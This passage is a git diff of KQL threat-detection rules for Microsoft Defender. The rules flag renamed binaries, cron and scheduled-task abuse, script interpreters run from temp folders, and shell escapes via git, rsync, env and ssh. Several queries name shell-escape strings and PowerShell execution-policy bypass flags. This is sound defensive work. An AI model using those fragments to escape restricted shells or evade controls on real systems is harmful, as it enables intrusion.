 | where ProcessVersionInfoOriginalFileName =~ "ftp.exe" and (not(FolderPath endswith "\\ftp.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/renamed_jusched_exe_execution.kql b/KQL/rules/Execution/renamed_jusched_exe_execution.kql
index bffe87f0..5f70c8ee 100644
--- a/KQL/rules/Execution/renamed_jusched_exe_execution.kql
+++ b/KQL/rules/Execution/renamed_jusched_exe_execution.kql
@@ -1,10 +1,10 @@
-// Title: Renamed Jusched.EXE Execution
-// Author: Markus Neis, Swisscom
-// Date: 2019-06-04
-// Level: high
-// Description: Detects the execution of a renamed "jusched.exe" as seen used by the cobalt group
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, attack.t1036.003
-
-DeviceProcessEvents
+// Title: Renamed Jusched.EXE Execution
+// Author: Markus Neis, Swisscom
+// Date: 2019-06-04
+// Level: high
+// Description: Detects the execution of a renamed "jusched.exe" as seen used by the cobalt group
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1036.003
+
+DeviceProcessEvents
 | where (ProcessVersionInfoFileDescription in~ ("Java Update Scheduler", "Java(TM) Update Scheduler")) and (not(FolderPath endswith "\\jusched.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/renamed_nircmd_exe_execution.kql b/KQL/rules/Execution/renamed_nircmd_exe_execution.kql
index 7595782e..c1b2c172 100644
--- a/KQL/rules/Execution/renamed_nircmd_exe_execution.kql
+++ b/KQL/rules/Execution/renamed_nircmd_exe_execution.kql
@@ -1,10 +1,10 @@
-// Title: Renamed NirCmd.EXE Execution
-// Author: X__Junior (Nextron Systems)
-// Date: 2024-03-11
-// Level: high
-// Description: Detects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202
-
-DeviceProcessEvents
+// Title: Renamed NirCmd.EXE Execution
+// Author: X__Junior (Nextron Systems)
+// Date: 2024-03-11
+// Level: high
+// Description: Detects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
 | where ProcessVersionInfoOriginalFileName =~ "NirCmd.exe" and (not((FolderPath endswith "\\nircmd.exe" or FolderPath endswith "\\nircmdc.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/renamed_pingcastle_binary_execution.kql b/KQL/rules/Execution/renamed_pingcastle_binary_execution.kql
index 5e8b56e3..1d5d21f5 100644
--- a/KQL/rules/Execution/renamed_pingcastle_binary_execution.kql
+++ b/KQL/rules/Execution/renamed_pingcastle_binary_execution.kql
@@ -1,10 +1,10 @@
-// Title: Renamed PingCastle Binary Execution
-// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2024-01-11
-// Level: high
-// Description: Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202
-
-DeviceProcessEvents
+// Title: Renamed PingCastle Binary Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2024-01-11
+// Level: high
+// Description: Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
 | where ((ProcessVersionInfoOriginalFileName in~ ("PingCastleReporting.exe", "PingCastleCloud.exe", "PingCastle.exe")) or (ProcessCommandLine contains "--scanner aclcheck" or ProcessCommandLine contains "--scanner antivirus" or ProcessCommandLine contains "--scanner computerversion" or ProcessCommandLine contains "--scanner foreignusers" or ProcessCommandLine contains "--scanner laps_bitlocker" or ProcessCommandLine contains "--scanner localadmin" or ProcessCommandLine contains "--scanner nullsession" or ProcessCommandLine contains "--scanner nullsession-trust" or ProcessCommandLine contains "--scanner oxidbindings" or ProcessCommandLine contains "--scanner remote" or ProcessCommandLine contains "--scanner share" or ProcessCommandLine contains "--scanner smb" or ProcessCommandLine contains "--scanner smb3querynetwork" or ProcessCommandLine contains "--scanner spooler" or ProcessCommandLine contains "--scanner startup" or ProcessCommandLine contains "--scanner zerologon") or ProcessCommandLine contains "--no-enum-limit" or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--level Full") or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--server ")) and (not((FolderPath endswith "\\PingCastleReporting.exe" or FolderPath endswith "\\PingCastleCloud.exe" or FolderPath endswith "\\PingCastle.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/renamed_psexec_service_execution.kql b/KQL/rules/Execution/renamed_psexec_service_execution.kql
index 8cf3205d..4f6d2b2d 100644
--- a/KQL/rules/Execution/renamed_psexec_service_execution.kql
+++ b/KQL/rules/Execution/renamed_psexec_service_execution.kql
@@ -1,12 +1,12 @@
-// Title: Renamed PsExec Service Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-07-21
-// Level: high
-// Description: Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators
-// MITRE Tactic: Execution
-// Tags: attack.execution
-// False Positives:
-// - Legitimate administrative tasks
-
-DeviceProcessEvents
+// Title: Renamed PsExec Service Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Legitimate administrative tasks
+
+DeviceProcessEvents
 | where ProcessVersionInfoOriginalFileName =~ "psexesvc.exe" and (not(FolderPath =~ "C:\\Windows\\PSEXESVC.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/ruby_inline_command_execution.kql b/KQL/rules/Execution/ruby_inline_command_execution.kql
index 4ad30b7c..5ae3f71a 100644
--- a/KQL/rules/Execution/ruby_inline_command_execution.kql
+++ b/KQL/rules/Execution/ruby_inline_command_execution.kql
@@ -1,10 +1,10 @@
-// Title: Ruby Inline Command Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-01-02
-// Level: medium
-// Description: Detects execution of ruby using the "-e" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-
-DeviceProcessEvents
+// Title: Ruby Inline Command Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-02
+// Level: medium
+// Description: Detects execution of ruby using the "-e" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " -e" and (FolderPath endswith "\\ruby.exe" or ProcessVersionInfoOriginalFileName =~ "ruby.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/scheduled_cron_task_job_linux.kql b/KQL/rules/Execution/scheduled_cron_task_job_linux.kql
index 779f7ee4..bf4850ee 100644
--- a/KQL/rules/Execution/scheduled_cron_task_job_linux.kql
+++ b/KQL/rules/Execution/scheduled_cron_task_job_linux.kql
@@ -1,12 +1,12 @@
-// Title: Scheduled Cron Task/Job - Linux
-// Author: Alejandro Ortuno, oscd.community
-// Date: 2020-10-06
-// Level: medium
-// Description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.003
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: Scheduled Cron Task/Job - Linux
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-06
+// Level: medium
+// Description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.003
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "/tmp/" and FolderPath endswith "crontab"
\ No newline at end of file
diff --git a/KQL/rules/Execution/scheduled_cron_task_job_macos.kql b/KQL/rules/Execution/scheduled_cron_task_job_macos.kql
index 64b63d10..639e1618 100644
--- a/KQL/rules/Execution/scheduled_cron_task_job_macos.kql
+++ b/KQL/rules/Execution/scheduled_cron_task_job_macos.kql
@@ -1,12 +1,12 @@
-// Title: Scheduled Cron Task/Job - MacOs
-// Author: Alejandro Ortuno, oscd.community
-// Date: 2020-10-06
-// Level: medium
-// Description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.003
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: Scheduled Cron Task/Job - MacOs
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-06
+// Level: medium
+// Description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.003
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "/tmp/" and FolderPath endswith "/crontab"
\ No newline at end of file
diff --git a/KQL/rules/Execution/scheduled_task_creation_via_schtasks_exe.kql b/KQL/rules/Execution/scheduled_task_creation_via_schtasks_exe.kql
index 49a6d73a..c12084fd 100644
--- a/KQL/rules/Execution/scheduled_task_creation_via_schtasks_exe.kql
+++ b/KQL/rules/Execution/scheduled_task_creation_via_schtasks_exe.kql
@@ -1,13 +1,13 @@
-// Title: Scheduled Task Creation Via Schtasks.EXE
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019-01-16
-// Level: low
-// Description: Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005, attack.s0111, car.2013-08-001, stp.1u
-// False Positives:
-// - Administrative activity
-// - Software installation
-
-DeviceProcessEvents
+// Title: Scheduled Task Creation Via Schtasks.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-01-16
+// Level: low
+// Description: Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005, attack.s0111, car.2013-08-001, stp.1u
+// False Positives:
+// - Administrative activity
+// - Software installation
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " /create " and FolderPath endswith "\\schtasks.exe") and (not((AccountName contains "AUTHORI" or AccountName contains "AUTORI"))) and (not((ProcessCommandLine contains "Microsoft\\Office\\Office Performance Monitor" and (FolderPath in~ ("C:\\Windows\\System32\\schtasks.exe", "C:\\Windows\\SysWOW64\\schtasks.exe")) and (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/Execution/script_event_consumer_spawning_process.kql b/KQL/rules/Execution/script_event_consumer_spawning_process.kql
index ecf4fcf9..3e9938a2 100644
--- a/KQL/rules/Execution/script_event_consumer_spawning_process.kql
+++ b/KQL/rules/Execution/script_event_consumer_spawning_process.kql
@@ -1,10 +1,10 @@
-// Title: Script Event Consumer Spawning Process
-// Author: Sittikorn S
-// Date: 2021-06-21
-// Level: high
-// Description: Detects a suspicious child process of Script Event Consumer (scrcons.exe).
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1047
-
-DeviceProcessEvents
+// Title: Script Event Consumer Spawning Process
+// Author: Sittikorn S
+// Date: 2021-06-21
+// Level: high
+// Description: Detects a suspicious child process of Script Event Consumer (scrcons.exe).
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msbuild.exe") and InitiatingProcessFolderPath endswith "\\scrcons.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/script_interpreter_execution_from_suspicious_folder.kql b/KQL/rules/Execution/script_interpreter_execution_from_suspicious_folder.kql
index 1c970738..e4b4bf3c 100644
--- a/KQL/rules/Execution/script_interpreter_execution_from_suspicious_folder.kql
+++ b/KQL/rules/Execution/script_interpreter_execution_from_suspicious_folder.kql
@@ -1,10 +1,10 @@
-// Title: Script Interpreter Execution From Suspicious Folder
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-02-08
-// Level: high
-// Description: Detects a suspicious script execution in temporary folders or folders accessible by environment variables
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-
-DeviceProcessEvents
+// Title: Script Interpreter Execution From Suspicious Folder
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-02-08
+// Level: high
+// Description: Detects a suspicious script execution in temporary folders or folders accessible by environment variables
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " -ep bypass " or ProcessCommandLine contains " -ExecutionPolicy bypass " or ProcessCommandLine contains " -w hidden " or ProcessCommandLine contains "/e:javascript " or ProcessCommandLine contains "/e:Jscript " or ProcessCommandLine contains "/e:vbscript ") or (FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "mshta.exe", "wscript.exe"))) and ((ProcessCommandLine contains ":\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\Temp" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "\\Windows\\Temp") or ((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/service_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/service_reconnaissance_via_wmic_exe.kql
index 15bca231..45f4628f 100644
--- a/KQL/rules/Execution/service_reconnaissance_via_wmic_exe.kql
+++ b/KQL/rules/Execution/service_reconnaissance_via_wmic_exe.kql
@@ -1,13 +1,13 @@
-// Title: Service Reconnaissance Via Wmic.EXE
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-02-14
-// Level: medium
-// Description: An adversary might use WMI to check if a certain remote service is running on a remote device.
-// When the test completes, a service information will be displayed on the screen if it exists.
-// A common feedback message is that "No instance(s) Available" if the service queried is not running.
-// A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1047
-
-DeviceProcessEvents
+// Title: Service Reconnaissance Via Wmic.EXE
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-14
+// Level: medium
+// Description: An adversary might use WMI to check if a certain remote service is running on a remote device.
+// When the test completes, a service information will be displayed on the screen if it exists.
+// A common feedback message is that "No instance(s) Available" if the service queried is not running.
+// A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "service" and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/service_started_stopped_via_wmic_exe.kql b/KQL/rules/Execution/service_started_stopped_via_wmic_exe.kql
index 0a722440..91f18f10 100644
--- a/KQL/rules/Execution/service_started_stopped_via_wmic_exe.kql
+++ b/KQL/rules/Execution/service_started_stopped_via_wmic_exe.kql
@@ -1,10 +1,10 @@
-// Title: Service Started/Stopped Via Wmic.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-06-20
-// Level: medium
-// Description: Detects usage of wmic to start or stop a service
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1047
-
-DeviceProcessEvents
+// Title: Service Started/Stopped Via Wmic.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-20
+// Level: medium
+// Description: Detects usage of wmic to start or stop a service
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "stopservice" or ProcessCommandLine contains "startservice") and (ProcessCommandLine contains " service " and ProcessCommandLine contains " call ")) and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/service_startuptype_change_via_powershell_set_service.kql b/KQL/rules/Execution/service_startuptype_change_via_powershell_set_service.kql
index 978851f5..fbe44881 100644
--- a/KQL/rules/Execution/service_startuptype_change_via_powershell_set_service.kql
+++ b/KQL/rules/Execution/service_startuptype_change_via_powershell_set_service.kql
@@ -1,12 +1,12 @@
-// Title: Service StartupType Change Via PowerShell Set-Service
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-03-04
-// Level: medium
-// Description: Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual"
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - False positives may occur with troubleshooting scripts
-
-DeviceProcessEvents
+// Title: Service StartupType Change Via PowerShell Set-Service
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-04
+// Level: medium
+// Description: Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual"
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - False positives may occur with troubleshooting scripts
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "Disabled" or ProcessCommandLine contains "Manual") and (ProcessCommandLine contains "Set-Service" and ProcessCommandLine contains "-StartupType")) and (FolderPath endswith "\\powershell.exe" or ProcessVersionInfoOriginalFileName =~ "PowerShell.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Execution/service_startuptype_change_via_sc_exe.kql b/KQL/rules/Execution/service_startuptype_change_via_sc_exe.kql
index d6155e69..d92aec12 100644
--- a/KQL/rules/Execution/service_startuptype_change_via_sc_exe.kql
+++ b/KQL/rules/Execution/service_startuptype_change_via_sc_exe.kql
@@ -1,12 +1,12 @@
-// Title: Service StartupType Change Via Sc.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-01
-// Level: medium
-// Description: Detect the use of "sc.exe" to change the startup type of a service to "disabled" or "demand"
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - False positives may occur with troubleshooting scripts
-
-DeviceProcessEvents
+// Title: Service StartupType Change Via Sc.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-01
+// Level: medium
+// Description: Detect the use of "sc.exe" to change the startup type of a service to "disabled" or "demand"
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - False positives may occur with troubleshooting scripts
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "disabled" or ProcessCommandLine contains "demand") and (ProcessCommandLine contains " config " and ProcessCommandLine contains "start")) and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/shell_execution_of_process_located_in_tmp_directory.kql b/KQL/rules/Execution/shell_execution_of_process_located_in_tmp_directory.kql
index cd79de2f..da13dec7 100644
--- a/KQL/rules/Execution/shell_execution_of_process_located_in_tmp_directory.kql
+++ b/KQL/rules/Execution/shell_execution_of_process_located_in_tmp_directory.kql
@@ -1,10 +1,10 @@
-// Title: Shell Execution Of Process Located In Tmp Directory
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2023-06-02
-// Level: high
-// Description: Detects execution of shells from a parent process located in a temporary (/tmp) directory
-// MITRE Tactic: Execution
-// Tags: attack.execution
-
-DeviceProcessEvents
+// Title: Shell Execution Of Process Located In Tmp Directory
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: high
+// Description: Detects execution of shells from a parent process located in a temporary (/tmp) directory
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
 | where (FolderPath endswith "/bash" or FolderPath endswith "/csh" or FolderPath endswith "/dash" or FolderPath endswith "/fish" or FolderPath endswith "/ksh" or FolderPath endswith "/sh" or FolderPath endswith "/zsh") and InitiatingProcessFolderPath startswith "/tmp/"
\ No newline at end of file
diff --git a/KQL/rules/Execution/shell_execution_via_git_linux.kql b/KQL/rules/Execution/shell_execution_via_git_linux.kql
index fe7759bb..2eadafa8 100644
--- a/KQL/rules/Execution/shell_execution_via_git_linux.kql
+++ b/KQL/rules/Execution/shell_execution_via_git_linux.kql
@@ -1,10 +1,10 @@
-// Title: Shell Execution via Git - Linux
-// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
-// Date: 2024-09-02
-// Level: high
-// Description: Detects the use of the "git" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-
-DeviceProcessEvents
+// Title: Shell Execution via Git - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the "git" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "bash 0<&1" or ProcessCommandLine contains "dash 0<&1" or ProcessCommandLine contains "sh 0<&1") and (InitiatingProcessCommandLine contains " -p " and InitiatingProcessCommandLine contains "help") and InitiatingProcessFolderPath endswith "/git"
\ No newline at end of file
diff --git a/KQL/rules/Execution/shell_execution_via_rsync_linux.kql b/KQL/rules/Execution/shell_execution_via_rsync_linux.kql
index aee469f9..fa87938e 100644
--- a/KQL/rules/Execution/shell_execution_via_rsync_linux.kql
+++ b/KQL/rules/Execution/shell_execution_via_rsync_linux.kql
@@ -1,12 +1,12 @@
-// Title: Shell Execution via Rsync - Linux
-// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.), Florian Roth
-// Date: 2024-09-02
-// Level: high
-// Description: Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-// False Positives:
-// - Legitimate cases in which "rsync" is used to execute a shell
-
-DeviceProcessEvents
+// Title: Shell Execution via Rsync - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.), Florian Roth
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Legitimate cases in which "rsync" is used to execute a shell
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/ash " or ProcessCommandLine contains "/bash " or ProcessCommandLine contains "/dash " or ProcessCommandLine contains "/csh " or ProcessCommandLine contains "/sh " or ProcessCommandLine contains "/zsh " or ProcessCommandLine contains "/tcsh " or ProcessCommandLine contains "/ksh " or ProcessCommandLine contains "'ash " or ProcessCommandLine contains "'bash " or ProcessCommandLine contains "'dash " or ProcessCommandLine contains "'csh " or ProcessCommandLine contains "'sh " or ProcessCommandLine contains "'zsh " or ProcessCommandLine contains "'tcsh " or ProcessCommandLine contains "'ksh ") and (ProcessCommandLine contains " -e " and (FolderPath endswith "/rsync" or FolderPath endswith "/rsyncd"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/shell_invocation_via_env_command_linux.kql b/KQL/rules/Execution/shell_invocation_via_env_command_linux.kql
index d7349c88..6c1e49de 100644
--- a/KQL/rules/Execution/shell_invocation_via_env_command_linux.kql
+++ b/KQL/rules/Execution/shell_invocation_via_env_command_linux.kql
@@ -1,12 +1,12 @@
-// Title: Shell Invocation via Env Command - Linux
-// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
-// Date: 2024-09-02
-// Level: high
-// Description: Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-// False Positives:
-// - Github operations such as ghe-backup
-
-DeviceProcessEvents
+// Title: Shell Invocation via Env Command - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Github operations such as ghe-backup
+
+DeviceProcessEvents
 | where (ProcessCommandLine endswith "/bin/bash" or ProcessCommandLine endswith "/bin/dash" or ProcessCommandLine endswith "/bin/fish" or ProcessCommandLine endswith "/bin/sh" or ProcessCommandLine endswith "/bin/zsh") and FolderPath endswith "/env"
\ No newline at end of file
diff --git a/KQL/rules/Execution/shell_invocation_via_ssh_linux.kql b/KQL/rules/Execution/shell_invocation_via_ssh_linux.kql
index 885ca822..a89ce264 100644
--- a/KQL/rules/Execution/shell_invocation_via_ssh_linux.kql
+++ b/KQL/rules/Execution/shell_invocation_via_ssh_linux.kql
@@ -1,10 +1,10 @@
-// Title: Shell Invocation Via Ssh - Linux
-// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
-// Date: 2024-08-29
-// Level: high
-// Description: Detects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-
-DeviceProcessEvents
+// Title: Shell Invocation Via Ssh - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-08-29
+// Level: high
+// Description: Detects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh" or ProcessCommandLine contains "sh 0<&2 1>&2" or ProcessCommandLine contains "sh 1>&2 0<&2") and ((ProcessCommandLine contains "ProxyCommand=;" or ProcessCommandLine contains "permitlocalcommand=yes" or ProcessCommandLine contains "localhost") and FolderPath endswith "/ssh")
\ No newline at end of file
diff --git a/KQL/rules/Execution/silenttrinity_stager_msbuild_activity.kql b/KQL/rules/Execution/silenttrinity_stager_msbuild_activity.kql
index 0e7beea9..60bd1a55 100644
--- a/KQL/rules/Execution/silenttrinity_stager_msbuild_activity.kql
+++ b/KQL/rules/Execution/silenttrinity_stager_msbuild_activity.kql
@@ -1,10 +1,10 @@
-// Title: Silenttrinity Stager Msbuild Activity
-// Author: Kiran kumar s, oscd.community
-// Date: 2020-10-11
-// Level: high
-// Description: Detects a possible remote connections to Silenttrinity c2
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, attack.t1127.001
-
-DeviceNetworkEvents
+// Title: Silenttrinity Stager Msbuild Activity
+// Author: Kiran kumar s, oscd.community
+// Date: 2020-10-11
+// Level: high
+// Description: Detects a possible remote connections to Silenttrinity c2
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1127.001
+
+DeviceNetworkEvents
 | where InitiatingProcessFolderPath endswith "\\msbuild.exe" and (RemotePort in~ ("80", "443"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/sql_client_tools_powershell_session_detection.kql b/KQL/rules/Execution/sql_client_tools_powershell_session_detection.kql
index 5e7fe91b..c73d11dc 100644
--- a/KQL/rules/Execution/sql_client_tools_powershell_session_detection.kql
+++ b/KQL/rules/Execution/sql_client_tools_powershell_session_detection.kql
@@ -1,13 +1,13 @@
-// Title: SQL Client Tools PowerShell Session Detection
-// Author: Agro (@agro_sev) oscd.communitly
-// Date: 2020-10-13
-// Level: medium
